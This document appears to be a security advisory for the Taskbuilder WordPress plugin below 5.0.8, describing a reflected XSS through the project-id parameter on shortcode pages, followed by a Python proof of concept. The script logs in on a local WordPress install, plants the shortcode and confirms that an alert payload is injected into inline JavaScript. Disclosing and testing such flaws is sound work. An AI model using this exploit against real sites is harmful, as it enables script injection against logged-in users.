Taskbuilder < 5.0.8 – Reflected XSS via Shortcode | CVE 2026-9570

Description

The plugin does not properly sanitise a URL parameter before echoing it into inline JavaScript on a frontend page containing one of its shortcodes, leading to a Reflected Cross-Site Scripting vulnerability that can be triggered against any logged-in user.

Proof of Concept

#!/usr/bin/env python3
"""
PoC3 for XSS vulnerability in Taskbuilder plugin (v5.0.6)

Flow:
1. Admin logs in and creates a page with [wppm_projects] shortcode
2. Subscriber logs in and visits the crafted malicious URL
3. XSS payload is confirmed in the response
"""

import requests
import re
from urllib.parse import quote

# --- Config ---
BASE_URL        = "http://localhost:8080"
ADMIN_USER      = "admin"
ADMIN_PASS      = "admin123"
SUBSCRIBER_USER = "subscriber"
SUBSCRIBER_PASS = "subscriber"
XSS_PAYLOAD     = "1);alert(1);//"
XSS_INDICATOR   = "wppm_open_project(1);alert(1);//)"
# ---------------


def login(session, username, password):
    session.get(f"{BASE_URL}/wp-login.php")
    session.post(f"{BASE_URL}/wp-login.php", data={
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'testcookie': '1',
    }, allow_redirects=True)
    cookies = {c.name for c in session.cookies}
    return any('wordpress_logged_in' in name for name in cookies)


def setup_page(session):
    response = session.get(f"{BASE_URL}/index.php?rest_route=/wp/v2/pages/2")
    if 'wppm' in response.text:
        return True
    match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"',
                      session.get(f"{BASE_URL}/wp-admin/post.php?post=2&action=edit").text)
    if not match:
        return False
    session.post(f"{BASE_URL}/wp-admin/post.php", data={
        '_wpnonce': match.group(1),
        '_wp_http_referer': '/wp-admin/post.php?post=2&action=edit',
        'user_ID': '1', 'action': 'editpost', 'originalaction': 'editpost',
        'post_type': 'page', 'original_post_status': 'publish',
        'post_ID': '2', 'post_title': 'Sample Page',
        'post_content': '[wppm_projects]',
    }, allow_redirects=True)
    return 'wppm' in session.get(f"{BASE_URL}/index.php?rest_route=/wp/v2/pages/2").text


def main():
    print("[*] PoC3 — Taskbuilder XSS: Admin sets up, Subscriber triggers\n")

    # Step 1: Admin creates the page
    print("[*] Step 1: Admin login and page setup...")
    admin = requests.Session()
    assert login(admin, ADMIN_USER, ADMIN_PASS), "Admin login failed"
    assert setup_page(admin), "Page setup failed"
    print("[+] Page with [wppm_projects] shortcode is ready")

    # Step 2: Subscriber visits the crafted URL
    print("\n[*] Step 2: Subscriber visits crafted URL...")
    sub = requests.Session()
    assert login(sub, SUBSCRIBER_USER, SUBSCRIBER_PASS), "Subscriber login failed"
    print("[+] Subscriber logged in")

    url = f"{BASE_URL}/?page_id=2&project-id={quote(XSS_PAYLOAD)}&auth-code=x"
    response = sub.get(url)

    if XSS_INDICATOR in response.text:
        print(f"[+] XSS confirmed!\n    URL: {url}")
    else:
        print("[-] XSS not triggered")


if __name__ == "__main__":
    main()